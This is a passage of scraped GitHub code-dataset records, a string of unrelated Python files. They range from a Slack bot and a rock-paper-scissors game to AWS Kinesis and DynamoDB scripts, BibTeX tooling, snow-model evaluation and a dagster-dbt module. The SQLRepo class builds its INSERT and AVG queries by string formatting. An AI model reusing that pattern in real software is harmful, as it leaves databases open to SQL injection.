\"\\nSorry paper beats rock!\")\n repeat = input(\"Would you like to play again (Please pick a number)?:\\n yes[0]\\nno[1]\")\n if repeat == 0:\n play_again = True\n else:\n play_again = False\n elif cpu_choice == 3:\n print(\"The Computer chose: \" + Hand(3).name + \"\\nRock beats scissors CONGRATULATIONS!!! YOU WIN!\")\n repeat = input(\"Would you like to play again (Please pick a number)?:\\n yes[0]\\nno[1]\")\n if repeat == 0:\n play_again = True\n else:\n play_again = False\n\nprint(\"Thanks for playing!\")\n","repo_name":"khactigner/RockPaperScissors","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30306536579","text":"\"\"\"\n File: ricFlair.py\n Version: 1.0.0\n Author: Chris Baudouin, Jr.\n\n Description: Anytime \"woo\" is mentioned in chat, abotimable will post a ric flair picture\n\"\"\"\nimport random\nimport re\nfrom .teamBotModule import TeamBotModule\n\n# Credit to the image owners\nrics = [\"https://i.pinimg.com/236x/63/47/83/634783c510e2564240db54ee141213e3--fighting-memes-ric-flair.jpg\",\n \"https://img.buzzfeed.com/buzzfeed-static/static/2015-03/13/16/enhanced/webdr10/enhanced-buzz-1212-1426277573-14.jpg\",\n \"https://i.ytimg.com/vi/XB21XNxtk5M/hqdefault.jpg\"]\n\n\nclass RicFlair():\n\n def __init__(self):\n pass\n\n def check_for_woo(self, slack_client, message):\n match_obj = re.match(r'wo{2,} *', message.text)\n if match_obj:\n rand = random.randint(0, len(rics)-1)\n message_response = slack_client.api_call(\n \"chat.postMessage\",\n channel=message.channel,\n attachments=[{\"fallback\": \"Required plain-text summary of the attachment.\",\n \"image_url\": rics[rand]}])\n\n def notify_message(self, slack_client, message):\n self.check_for_woo(slack_client, message)\n\n\nTeamBotModule.register(RicFlair)\n","repo_name":"Nitepone/abotimable","sub_path":"abotimable/ricFlair.py","file_name":"ricFlair.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"24245355952","text":"import pymysql\nimport sqlalchemy.pool as pool\nimport Constants\nimport os\nimport logging\nfrom error_handler import MessageException\n\n\nclass SQLRepo:\n def __init__(self):\n def get_conn():\n connection = pymysql.connect(user=str(os.environ['DB_USER']), password=str(os.environ['DB_PASSWORD']),\n db=str(os.environ['DB_NAME']), host=str(os.environ['DB_HOST']))\n return connection\n\n # defining connection pool\n self.mypool = pool.QueuePool(get_conn, max_overflow=Constants.MAX_OVERFLOW, pool_size=Constants.POOL_SIZE)\n\n def add_message_request(self, message_no: int, arrival_time: str, transmission_time: str):\n \"\"\"\n Function to add message request to db\n\n :param message_no: int: message number\n :param arrival_time: str: arrival time of the message request\n :param transmission_time: str: transmission time of the message request from producer\n :return:\n \"\"\"\n conn = self.mypool.connect()\n cursor = conn.cursor()\n try:\n cursor.execute(\n \"INSERT IGNORE INTO consumer VALUES ({message_no},'{transmission_time}','{arrival_time}')\".format(\n message_no=int(message_no), arrival_time=arrival_time, transmission_time=transmission_time))\n conn.commit()\n except pymysql.Error as e:\n logging.error(\"cannot perform a query to insert data\")\n logging.error(e)\n raise e\n finally:\n cursor.close()\n conn.close()\n return True\n\n def get_max_message_number(self):\n \"\"\"\n Function to get max message number till now\n\n :return: int: message number\n \"\"\"\n conn = self.mypool.connect()\n cursor = conn.cursor()\n\n try:\n max_message_query = \"SELECT MAX(message_no) as max_number from consumer\"\n cursor.execute(max_message_query)\n result = cursor.fetchone()\n\n if result:\n return result[0]\n else:\n return 0\n except pymysql.Error as e:\n logging.error(\"cannot perform a query pymysql\")\n logging.error(e)\n raise e\n finally:\n cursor.close()\n conn.close()\n\n def avg_time(self, seconds: int = 10):\n \"\"\"\n Function to get average time based on seconds\n\n :param seconds: int:\n :return: int: average time of transmission of messages in last {seconds} seconds\n \"\"\"\n conn = self.mypool.connect()\n cursor = conn.cursor()\n\n try:\n avg_time_query = f\"\"\"SELECT AVG(arrival_time - transmission_time) as avg_time\n FROM consumer\n WHERE arrival_time >= (now() - interval {seconds} second)\"\"\"\n logging.info(avg_time_query)\n\n cursor.execute(avg_time_query)\n result = cursor.fetchone()\n\n if result and result[0]:\n return \"{:.4f}\".format(round(float(str(result[0])), 4))\n else:\n return 0\n except pymysql.Error as e:\n logging.error(\"cannot perform a query\")\n logging.error(e)\n raise e\n finally:\n cursor.close()\n conn.close()\n","repo_name":"anipshah/Producer-Redis-Consumer-MySQL-React","sub_path":"consumer/repository/SQLRepo.py","file_name":"SQLRepo.py","file_ext":"py","file_size_in_byte":3341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71679549927","text":"import pygame\nimport sys\nfrom pygame.locals import *\n\ndef main():\n pygame.init()\n FPS = 30\n fpsClock = pygame.time.Clock()\n\n window_size = (0, 0)\n screen = pygame.display.set_mode(window_size)\n\n pygame.display.set_caption(\"Making Stuff Move\")\n\n WHITE = pygame.Color(255, 255, 255)\n GOLD = pygame.Color(255, 215, 0)\n RED = pygame.Color(255, 0, 0)\n\n screen.fill(WHITE)\n colors_for_house = {'house': GOLD, 'roof': RED}\n\n house = House(200, 200, 100, colors_for_house)\n house.draw(screen)\n\n move_up = False;\n move_down = False;\n move_left = False;\n move_right = False;\n\n while True: # <--- main game loop\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n\n if event.type == KEYDOWN:\n if event.key == K_UP:\n move_up = True\n if event.key == K_DOWN:\n move_down = True\n if event.key == K_LEFT:\n move_left = True\n if event.key == K_RIGHT:\n move_right = True\n\n if event.type == KEYUP:\n if event.key == K_UP:\n move_up = False\n if event.key == K_DOWN:\n move_down = False\n if event.key == K_LEFT:\n move_left = False\n if event.key == K_RIGHT:\n move_right = False\n\n if move_up:\n house.changeY(-10)\n if move_down:\n house.changeY(10)\n if move_left:\n house.changeX(-10)\n if move_right:\n house.changeX(10)\n\n # redraw the background and house each frame\n screen.fill(WHITE)\n house.draw(screen)\n pygame.display.update()\n fpsClock.tick(FPS)\n\nclass House:\n\n def __init__(self, x, y, size, colors):\n self.x = x\n self.y = y\n self.size = size\n self.colors = colors\n\n def draw(self, screen):\n pygame.draw.rect(screen, self.colors['house'], [self.x, self.y, self.size, self.size] )\n self.__draw_roof(screen)\n\n def __draw_roof(self, screen):\n pointlist = [ (self.x - 20, self.y), (self.x + self.size + 20, self.y), (self.x + 100, self.y - 100)]\n\n pygame.draw.polygon(screen, self.colors['roof'], pointlist)\n\n def changeX(self, inc):\n self.x += inc;\n\n def changeY(self, inc):\n self.y += inc;\n\nif __name__ == \"__main__\":\n main()","repo_name":"calstatelaacm/lets_learn_python_with_pygame","sub_path":"pygame/3 Making Stuff Move/making_stuff_move.py","file_name":"making_stuff_move.py","file_ext":"py","file_size_in_byte":2524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71080104167","text":"from django.urls import path\n\nfrom users.views import login_view, AlternativeLoginView, AnotherLogoutView\n\n\nurlpatterns = [\n path('login/', login_view, name='login'),\n # дополнительная форма авторизации сделаная с помощью специальной вьюхи LoginView. Чисто для теста.\n path('alternative_login/', AlternativeLoginView.as_view(), name='alternative_login'),\n path('logout/', AnotherLogoutView.as_view(), name='logout'),\n]","repo_name":"igor-kushnarenko/hardware_accounting","sub_path":"hardware/users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38633571458","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Mar 13 13:43:41 2016\n\n@author: mje\n\"\"\"\nimport pandas as pd\nimport mne\n\n\nfor subject in subjects:\n raw = mne.io.Raw(maxfiltered_folder + \"%s_data_mc_raw_tsss.fif\" % subject)\n events = mne.find_events(raw, min_duration=0.01)\n mne.write_events(log_folder + \"%s-eve.fif\" % subject, events) \n\n\nfor subject in subjects:\n df = make_log_file(subject)\n df.to_csv(log_folder + \"%s_log_file.csv\" %subject, index=False)\n \nresults = pd.DataFrame()\nfor subject in subjects:\n df = pd.read_csv(log_folder + \"%s_log_file.csv\" %subject)\n df[\"subject\"] = subject\n \n results = results.append(df, ignore_index=True)\n \n","repo_name":"MadsJensen/malthe_alpha_project","sub_path":"log_file_wrapper.py","file_name":"log_file_wrapper.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"18027450648","text":"import json\nimport boto3\n\nfrom app_flow.utils.wiki import fetch_latest_wikipedia_data\n\n\ndef run():\n\n # Create a Kinesis client\n kinesis_client = boto3.client('kinesis')\n\n last_timestamp = 0\n\n while True:\n for data in fetch_latest_wikipedia_data(last_timestamp):\n\n # Publish a record to the Kinesis stream\n response = kinesis_client.put_record(\n StreamName='demo-kinesis-bench-de',\n Data=data,\n PartitionKey='partitionKey-03'\n )\n\n print(f\"The message was sent to Kinesis.\")\n print(f\"Stream Name: demo-kinesis-bench-de\")\n print(f\"Partition Key: partitionKey-03\")\n print(f\"Sequence Number: {response['SequenceNumber']}\")\n print(f\"Shard ID: {response['ShardId']}\")\n print(f\"Data: {data}\")\n\n change = json.loads(data)\n last_timestamp = int(change.get(\"timestamp\", last_timestamp))\n\n\nrun()\n","repo_name":"leonardohss0/data-streaming-with-kinesis","sub_path":"app_flow/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"3841816239","text":"import json\nimport logging\nfrom datetime import date, datetime\nimport os\nimport boto3\nfrom botocore.exceptions import ClientError\n\"\"\"\nawsls dynamodb list-tables\n\n\"\"\"\nAWS_REGION = 'eu-central-1'\nAWS_PROFILE = 'localstack_dev'\nENDPOINT_URL = 'http://localhost:4566'\n\n\nlogger = logging.getLogger()\nlogging.basicConfig(level=logging.INFO,\n format='%(asctime)s: %(levelname)s: %(message)s')\nboto3.setup_default_session(profile_name=AWS_PROFILE)\ndynamodb_client = boto3.client(\n \"dynamodb\", region_name=AWS_REGION, endpoint_url=ENDPOINT_URL)\n\n\ndef json_datetime_serializer(obj):\n \"\"\"\n Helper method to serialize datetime fields\n \"\"\"\n if isinstance(obj, (datetime, date)):\n return obj.isoformat()\n raise TypeError(\"Type %s not serializable\" % type(obj))\n\n\ndef create_dynamodb_table(table_name):\n \"\"\"\n Creates a DynamoDB table.\n \"\"\"\n try:\n response = dynamodb_client.create_table(\n TableName=table_name,\n KeySchema=[\n {\n 'AttributeName': 'Name',\n 'KeyType': 'HASH'\n },\n {\n 'AttributeName': 'Email',\n 'KeyType': 'RANGE'\n }\n ],\n AttributeDefinitions=[\n {\n 'AttributeName': 'Name',\n 'AttributeType': 'S'\n },\n {\n 'AttributeName': 'Email',\n 'AttributeType': 'S'\n }\n ],\n ProvisionedThroughput={\n 'ReadCapacityUnits': 1,\n 'WriteCapacityUnits': 1\n },\n Tags=[\n {\n 'Key': 'Name',\n 'Value': 'localstack-dynamodb-table'\n }\n ])\n except ClientError:\n logger.exception('Could not create the table.')\n raise\n else:\n return response\n\n\ndef main():\n \"\"\"\n Main invocation function.\n \"\"\"\n table_name = 'localstack-dynamodb-table'\n logger.info('Creating a DynamoDB table...')\n dynamodb = create_dynamodb_table(table_name)\n logger.info(\n f'DynamoDB table created: {json.dumps(dynamodb, indent=4, default=json_datetime_serializer)}')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Mertozturkk/localstack_template","sub_path":"dynamodb_examples/create_ddb_table.py","file_name":"create_ddb_table.py","file_ext":"py","file_size_in_byte":2329,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"1764910281","text":"import pdf2bib\nfrom django.conf import settings\nimport pdf2doi\nimport os\nimport io\nimport urllib.parse\nfrom .bibtex_fields import dict_csl_bib, dict_type_csl_bib\nfrom citeproc import CitationStylesStyle, CitationStylesBibliography\nfrom citeproc import formatter\nfrom citeproc import Citation, CitationItem\n\ndef create_bibtex(path):\n new_path = os.path.join(settings.MEDIA_ROOT, path)\n pdf2bib.config.set('verbose',False)\n # print(f\"NEW PATH: {new_path}\")\n result = pdf2bib.pdf2bib(new_path)\n\n # output_path = os.path.join(settings.MEDIA_ROOT, 'output/1')\n # with io.open(output_path,'w',encoding='utf8') as f:\n # f.write(result['validation_info'])\n print(result)\n return result\n\ndef get_doi(path):\n new_path = os.path.join(settings.MEDIA_ROOT, path)\n result = pdf2doi.pdf2doi(new_path)\n print(result)\n return result\n\ndef test(data):\n for key, value in data.items():\n print(f\"{key}: {value}\")\n return \"bibtex test\"\n\ndef make_bibtex(metadata):\n # data = metadata.copy()\n print(f\"METADATA: {metadata}\")\n data = dict()\n for key, value in dict_csl_bib.items():\n if key in metadata:\n data[value] = metadata[key]\n print(data)\n data['type'] = dict_type_csl_bib.get(metadata['type'])\n print(data)\n if not data['type']:\n return dict()\n if 'pages' in data:\n data['pages'] = data['pages'].replace('-', '--')\n if data['type'] == 'inbook':\n data['booktitle'] = metadata['container-title']\n elif data['type'] == 'article':\n data['journal'] = metadata['container-title']\n if 'issued' in metadata:\n data['year'] = metadata['issued']['date-parts'][0][0]\n if len(metadata['issued']['date-parts'][0]) == 2:\n data['month'] = metadata['issued']['date-parts'][0][1]\n authors_tmp = metadata['author']\n authors = list()\n for author in authors_tmp:\n authors.append(author[\"given\"] + ' ' + author['family'])\n\n id = metadata['id']\n\n #Sanitize the URL\n if 'url' in data.keys():\n data['url'] = urllib.parse.unquote(data['url'])\n\n\n if isinstance(authors,list):\n authors_string = \" and \".join([author for author in authors])\n data['author'] = authors_string\n elif isinstance(authors,str):\n data['author'] = authors\n\n #Create the bibtex entry as a string \n metadata_not_to_use = ['type'] #These are temporary metadata, not useful for bibtex\n text = [\"@\"+data['type'].upper()+\"{\" + id]\n result = dict()\n for key, value in data.items():\n if value and not (key in metadata_not_to_use):\n text.append(\"\\t%s = {%s}\" % (key, value))\n result['bibtex'] = (\",\\n\").join(text) + \"\\n\" + \"}\"\n result['id'] = id\n \n return result\n\n# def make_style(id_item, bib_source, style):\n# print(f'id item: {id_item}')\n# print(f'bib source: {bib_source}')\n# style_dir = os.path.join(settings.BASE_DIR, 'csl')\n# style_path = os.path.join(style_dir, style + '.csl')\n# bib_style = CitationStylesStyle(style_path, locale='ru-RU', validate=False)\n# bibliography = CitationStylesBibliography(bib_style, bib_source)\n# citation1 = Citation([CitationItem(id_item)])\n# bibliography.register(citation1)\n# def warn(citation_item):\n# print(\"WARNING: Reference with key '{}' not found in the bibliography.\"\n# .format(citation_item.key))\n\n\n# print('Citations')\n# print('---------')\n\n# print(bibliography.cite(citation1, warn))\n# print('')\n# print('Bibliography')\n# print('------------')\n# result = ''\n# for item in bibliography.bibliography():\n# result = str(item)\n# print(str(item))\n# return result","repo_name":"PavVlada/last_test","sub_path":"publication/bibtex_helpers.py","file_name":"bibtex_helpers.py","file_ext":"py","file_size_in_byte":3699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22075545455","text":"\n# coding: utf-8\n\n# __A (Original Matrix) = u * S * v__\n\n# - A = Input data matrix (m * n)\n# - v = Right singular vectors, holds important, non redundant information on features (r * n)\n# - S (or sigma) = diagnal matrix; contains all of the information about the decomposition processes performed during the compression\n# (r * r)\n# - u = Left singular vectors (m * r)\n\n# In[2]:\n\n\nimport pandas as pd\nimport numpy as np\nfrom sklearn import linear_model\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.decomposition import PCA, TruncatedSVD\n\n\n# In[3]:\n\n\n#Load the boston dataset\nfrom sklearn.datasets import load_boston\nboston = load_boston()\nX = pd.DataFrame(boston.data, columns = boston.feature_names)\ny = pd.DataFrame(boston.target)\n\n\n# In[4]:\n\n\nX.describe()\n\n\n# In[5]:\n\n\nX.info()\n\n\n# In[7]:\n\n\nreg = linear_model.LinearRegression()\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.25,\n random_state = 2019)\n\n\n# In[8]:\n\n\nreg.fit(X_train, y_train)\nreg.score(X_test, y_test)\n\n\n# In[23]:\n\n\n#Using pca\npca = PCA(n_components = 10, whiten = 'True')\nx = pca.fit(X).transform(X)\n\n\n# In[24]:\n\n\npca.explained_variance_\n\n\n# In[25]:\n\n\npca_reg = linear_model.LinearRegression()\nX_train, X_test, y_train, y_test = train_test_split(x, y, test_size = 0.25,\n random_state = 2019)\npca_reg.fit(X_train, y_train)\n\n\n# In[26]:\n\n\npca_reg.score(X_test, y_test)\n\n\n# In[29]:\n\n\n#Truncated SVD\nsvd = TruncatedSVD(n_components = 10)\nx = svd.fit(X).transform(X)\nsvd_reg = linear_model.LinearRegression()\nX_train, X_test, y_train, y_test = train_test_split(x, y, test_size = 0.25,\n random_state = 2019)\nsvd_reg.fit(X_train, y_train)\n\n\n# In[30]:\n\n\nsvd_reg.score(X_test, y_test)\n\n","repo_name":"JJtheNOOB/PCA-SVD-in-python","sub_path":"Singular Value Decomposition (SVD).py","file_name":"Singular Value Decomposition (SVD).py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5575378713","text":"# Standard modules\nimport matplotlib as mpl\n# mpl.use('Agg')\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport xarray as xr\nimport sys\nimport imp\nimport os\nimport cartopy.crs as ccrs\nimport cartopy.io.shapereader as shpreader\nimport seaborn as sns\nplt.rcParams.update({'figure.max_open_warning': 0})\n# SnowCast modules\nimport CHM_functions as chmF\n\n# General plotting settings\nsns.set_style('whitegrid')\nsns.set_context(\"talk\", font_scale=1.5, rc={\"lines.linewidth\": 2.5})\nfig_res = 90 # dpi\n\n# Load in config file\n####### load user configurable paramters here #######\n# Check user defined configuraiton file\nif len(sys.argv) != 3:\n sys.exit('Requires two arguments [configuration file] [chm_run_dir]')\n\n# Get name of configuration file/module\nconfigfile = sys.argv[1]\nchm_run_dir = str(sys.argv[2])\n\nif chm_run_dir=='forecast_CRHO_spinup':\n c_run_dt_in = 'H'\nelif chm_run_dir=='HRDPS_Current_BS':\n c_run_dt_in = 'H'\nelif chm_run_dir=='HRDPS_Historical':\n c_run_dt_in = 'H'\nelif chm_run_dir=='GDPS_Current':\n c_run_dt_in = '3H'\nelse:\n sys.exit('Model run name not found')\n\n# Load in configuration file as module\nX = imp.load_source('',configfile)\n\n# Assign to local variables\ndata_dir = X.data_dir\ngit_dir = X.git_dir\n\nmain_dir = os.path.join(git_dir, 'CHM_Configs', chm_run_dir)\nfig_dir = os.path.join(main_dir , 'figures', 'Error_Maps')\n\n# Make fig dir\nif not os.path.isdir(os.path.join(main_dir, 'figures')):\n os.mkdir(os.path.join(main_dir, 'figures'))\nif not os.path.isdir(fig_dir):\n os.mkdir(fig_dir)\n\n\n\n# Make dictionary of obs:model variable names to compare\n# model:obs\nvars_all = {'AirtemperatureA':'t','AirMoistureContentA':'rh','IncrementalPrecipitationA':'p',\n 'ScalarWindSpeedA':'U_2m_above_srf','DownwardSolarRadiation':'iswr','DownwardTerrestrialRad':'ilwr',\n 'UpwardTerrestrialRad':'ilwr_out',\n 'SnowWaterEquivelentA':'swe','SnowDepthA':'snowdepthavg','WindDirectionatA':'vw_dir',\n 'Time_UTC':'time','staID':'station'}\n\nplot_key = {'ilwr_out':'Outgoing Longwave','T_s_0':'Surface temperature','t':'Air Temperature','rh':'Relative Humidity',\n 'p':'Precipitation','ilwr':'Incoming Longwave','iswr':'Shortwave Radiation',\n 'U_2m_above_srf':'Wind Speed','vw_dir':'Wind Direction','swe':'Snow Water Equivalent','snowdepthavg':'Snowdepth'}\n\nylabel_unit = {'ilwr_out':'W m-2','G':'W m-2','T_s_0':'C','t':'C','rh':'%','p':'m','ilwr':'W m-2','iswr':'W m-2',\n 'U_2m_above_srf':'m/s','vw_dir':'degrees true north','swe':'m','snowdepthavg':'m'}\n\n###################################\n# Load data in\n###################################\n\n# File paths\nfile_in = os.path.join(data_dir, 'QC', 'Hourly_QC.nc') # CRHO and other data\nsnow_survey_in = os.path.join(data_dir, 'CRHO_HIST', 'netcdf', 'CRHO_Snow_Survey_Individual.nc')\nEC_snow_course_in = os.path.join(data_dir, 'EC_Snow_Courses', 'netcdf', 'EC_Snow_Courses.nc')\ndem_file = os.path.join(data_dir, 'Static_data', 'SnowCast.tif')\np_file = os.path.join(data_dir, 'Static_data', 'CAN_adm1.shp')\nc_mod_file = os.path.join(main_dir,'points','CHM_pts.nc')\n\n# Load all obs\nOBS_data = xr.open_dataset(file_in, engine='netcdf4') #.load()\n# print(OBS_data.IncrementalPrecipitationA.sum(dim='Time_UTC').sum(dim='staID'))\n\n# Snow surveys\nSS_data = xr.open_dataset(snow_survey_in,engine='netcdf4')\nEC_data = xr.open_dataset(EC_snow_course_in)\n\n# For current exp/folder, get netcdf file\nMod_data = xr.open_dataset(c_mod_file,engine='netcdf4')\n\n# Load in dem\ndem = xr.open_rasterio(dem_file).sel(band=1).drop('band')\n# Provences\np_sh = list(shpreader.Reader(p_file).geometries())\n\n####################################\n# Modify data\n####################################\n# Rename obs variable names to model variable names\nOBS_data.rename(vars_all, inplace=True);\nEC_data.rename({'staID':'station', 'Time_UTC':'time', 'SnowDepth_point':'snowdepthavg', 'SWE_point':'swe'}, inplace=True);\n# Filling in missing SW values at night (these were negative values that in QC SHOULD have been set to zero)\n# OBS_data['iswr'] = OBS_data['iswr'].fillna(0)\n# print('iswr fill is hack, need to fix upstream')\n\ndt_eval_hr = {'H':1, '3H':3, 'MS':999999, 'W':999999} # This converts resample() strs to int hours. Use 999 if N/A.\n\n#################################################\n# Resample and make common\n#################################################\n\n# Get common obs and model\n(obs_dt_val, mod_dt_val) = chmF.make_common(OBS_data, Mod_data, c_run_dt_in, dt_eval_hr,\n remove_missing=True, percent_nan_allowed=20)\n\n# Memory Clean up\nOBS_data = None\nMod_data = None\n\n\n#############################################################\n# Set up plotting info\n#############################################################\nsta_list = np.sort(mod_dt_val.station)\n\nlat_r = obs_dt_val.Lat.max()-obs_dt_val.Lat.min()\nlon_r = obs_dt_val.Lon.max()-obs_dt_val.Lon.min()\nbdy = 0.2\nbox = [obs_dt_val.Lon.min()-lon_r*bdy, obs_dt_val.Lon.max()+lon_r*bdy, obs_dt_val.Lat.min()-lat_r*bdy, obs_dt_val.Lat.max()+lat_r*bdy]\n\ndem = dem.where(dem>0)\ndem = dem.where((dem.x>box[0]) & (dem.xbox[2]) & (dem.y1:\n cvar_units = ylabel_unit[cvar]\n if cvar=='p':\n cvar_units='%' # Overwrite as percent\n cf = chmF.plot_point_metric(dem, da_metric, plot_key[cvar], cvar_units, cmap_dict[ctype], ctype)\n # Save Figure\n file_out = os.path.join(fig_dir, cvar+'_'+ctype+'.png')\n chmF.save_figure(cf, file_out, fig_res)\n else:\n print(\"No data for \",cvar,\" skipping plot\")\n\n# Example: Hourly RMSE\nprint(\"Plotting RMSE's\")\nfor cvar in ['t', 'rh', 'U_2m_above_srf', 'p', 'ilwr', 'iswr']:\n ctype = 'rmse'\n da_metric = chmF.calc_rmse(obs_dt_val, mod_dt_val, cvar)\n if da_metric.notnull().sum() > 1:\n # Make plot\n cf = chmF.plot_point_metric(dem, da_metric, plot_key[cvar], ylabel_unit[cvar], cmap_dict[ctype], ctype)\n # Save Figure\n file_out = os.path.join(fig_dir, cvar+'_'+ctype+'.png')\n chmF.save_figure(cf, file_out, fig_res)\n else:\n print(\"No data for \", cvar, \" skipping plot\")\n\n# Answer specific questions\n\n# What is GEM ISWR error at FRG?\nTS = '2014-11-01'\nTE = '2016-08-30' # Per paper period used\ncvar='iswr'\ncsta=b'FRG'\nplt.figure()\nobs_dt_val[cvar].sel(station=csta).plot()\nmod_dt_val[cvar].sel(station=csta).plot()\nplt.figure()\nplt.scatter(obs_dt_val[cvar].sel(station=csta), mod_dt_val[cvar].sel(station=csta))\n\nprint(\"What is GEM ISWR error at FRG?\")\nhrly_obs = obs_dt_val.fillna(0).sel(time=slice(TS,TE))\nhrly_mod = mod_dt_val.fillna(0).sel(time=slice(TS,TE))\nda_rmse = chmF.calc_rmse(hrly_obs, hrly_mod, cvar)\nda_bias = chmF.calc_bias(hrly_obs, hrly_mod, cvar)\nds_r2 = chmF.calc_r2(hrly_obs, hrly_mod, cvar)\nprint(\"At Hourly time steps\")\nprint(csta, \" had rmse of \", da_rmse.sel(station=csta).values)\nprint(csta, \" had bias of \", da_bias.sel(station=csta).values)\nprint(csta, \" had r2 of \", ds_r2.sel(station=csta).values)\n\ndly_obs = obs_dt_val.fillna(0).resample(freq='D', dim='time', how='mean', label='left', skipna=True).sel(time=slice(TS,TE))\ndly_mod = mod_dt_val.fillna(0).resample(freq='D', dim='time', how='mean', label='left', skipna=True).sel(time=slice(TS,TE))\ndly_da_rmse = chmF.calc_rmse(dly_obs, dly_mod, cvar)\ndly_da_bias = chmF.calc_bias(dly_obs, dly_mod, cvar)\ndly_ds_r2 = chmF.calc_r2(dly_obs, dly_mod, cvar)\nprint(\"At Daily time steps\")\nprint(csta, \" had rmse of \", dly_da_rmse.sel(station=csta).values)\nprint(csta, \" had bias of \", dly_da_bias.sel(station=csta).values)\nprint(csta, \" had r2 of \", dly_ds_r2.sel(station=csta).values)\n\n\n# In[11]:\n#\n# fig = plt.figure(figsize=(20, 20))\n# ax1 = plt.axes(projection=ccrs.AlbersEqualArea())\n# # ax1.set_extent(box)\n# ax1.imshow(np.flipud(dem.values), extent=[np.min(dem.x), np.max(dem.x),\n# np.min(dem.y), np.max(dem.y)], aspect=ax1.get_aspect())\n# # ax1.set_title('Elevation')\n# for c_net in set(obs_dt_val.network.values):\n# lat_pts = obs_dt_val.Lat.sel(station=(obs_dt_val.where(obs_dt_val.network == c_net, drop=True).network).station).values\n# lon_pts = obs_dt_val.Lon.sel(station=(obs_dt_val.where(obs_dt_val.network == c_net, drop=True).network).station).values\n# I_not_nan = ~np.isnan(lat_pts) & ~np.isnan(lon_pts)\n# lat_pts = lat_pts[I_not_nan]\n# lon_pts = lon_pts[I_not_nan]\n#\n# ax1.scatter(lon_pts, lat_pts, transform=ccrs.AlbersEqualArea(), s=50, c=cmap_network[c_net], zorder=100,\n# label=c_net) # yc, xc -- lists or numpy arrays\n#\n# # Snow Courses\n# lat_pts = EC_data.Lat.values\n# lon_pts = EC_data.Lon.values\n# I_not_nan = ~np.isnan(lat_pts) & ~np.isnan(lon_pts)\n# lat_pts = lat_pts[I_not_nan]\n# lon_pts = lon_pts[I_not_nan]\n#\n# ax1.scatter(lon_pts, lat_pts, transform=ccrs.AlbersEqualArea(), marker='o', s=50, c='m', zorder=200,\n# label='EC Snow Course') # yc, xc -- lists or numpy arrays\n#\n# ax1.add_geometries(p_sh, ccrs.AlbersEqualArea(),\n# edgecolor='black', facecolor='none', alpha=0.5)\n# plt.legend()\n#\n# plt.show()","repo_name":"NicWayand/SnowCast","sub_path":"Post_Processing/Point_Evals/SnowCast_Spatial_Error_Maps.py","file_name":"SnowCast_Spatial_Error_Maps.py","file_ext":"py","file_size_in_byte":10265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9892322947","text":"import hashlib\nimport textwrap\nfrom typing import (\n TYPE_CHECKING,\n AbstractSet,\n Any,\n Dict,\n FrozenSet,\n List,\n Mapping,\n Optional,\n Sequence,\n Set,\n Tuple,\n cast,\n)\n\nfrom dagster import (\n AssetCheckSpec,\n AssetKey,\n AssetsDefinition,\n AssetSelection,\n AutoMaterializePolicy,\n DagsterInvariantViolationError,\n FreshnessPolicy,\n In,\n MetadataValue,\n Nothing,\n Out,\n RunConfig,\n ScheduleDefinition,\n TableColumn,\n TableSchema,\n _check as check,\n define_asset_job,\n)\nfrom dagster._core.definitions.decorators.asset_decorator import (\n _validate_and_assign_output_names_to_check_specs,\n)\nfrom dagster._utils.merger import merge_dicts\nfrom dagster._utils.warnings import deprecation_warning\n\nfrom .utils import input_name_fn, output_name_fn\n\nif TYPE_CHECKING:\n from .dagster_dbt_translator import (\n DagsterDbtTranslator,\n DagsterDbtTranslatorSettings,\n DbtManifestWrapper,\n )\n\nMANIFEST_METADATA_KEY = \"dagster_dbt/manifest\"\nDAGSTER_DBT_TRANSLATOR_METADATA_KEY = \"dagster_dbt/dagster_dbt_translator\"\n\n\ndef get_asset_key_for_model(dbt_assets: Sequence[AssetsDefinition], model_name: str) -> AssetKey:\n \"\"\"Return the corresponding Dagster asset key for a dbt model.\n\n Args:\n dbt_assets (AssetsDefinition): An AssetsDefinition object produced by\n load_assets_from_dbt_project, load_assets_from_dbt_manifest, or @dbt_assets.\n model_name (str): The name of the dbt model.\n\n Returns:\n AssetKey: The corresponding Dagster asset key.\n\n Examples:\n .. code-block:: python\n\n from dagster import asset\n from dagster_dbt import dbt_assets, get_asset_key_for_model\n\n @dbt_assets(manifest=...)\n def all_dbt_assets():\n ...\n\n\n @asset(deps={get_asset_key_for_model([all_dbt_assets], \"customers\")})\n def cleaned_customers():\n ...\n \"\"\"\n check.sequence_param(dbt_assets, \"dbt_assets\", of_type=AssetsDefinition)\n check.str_param(model_name, \"model_name\")\n\n manifest, dagster_dbt_translator = get_manifest_and_translator_from_dbt_assets(dbt_assets)\n\n matching_models = [\n value\n for value in manifest[\"nodes\"].values()\n if value[\"name\"] == model_name and value[\"resource_type\"] == \"model\"\n ]\n\n if len(matching_models) == 0:\n raise 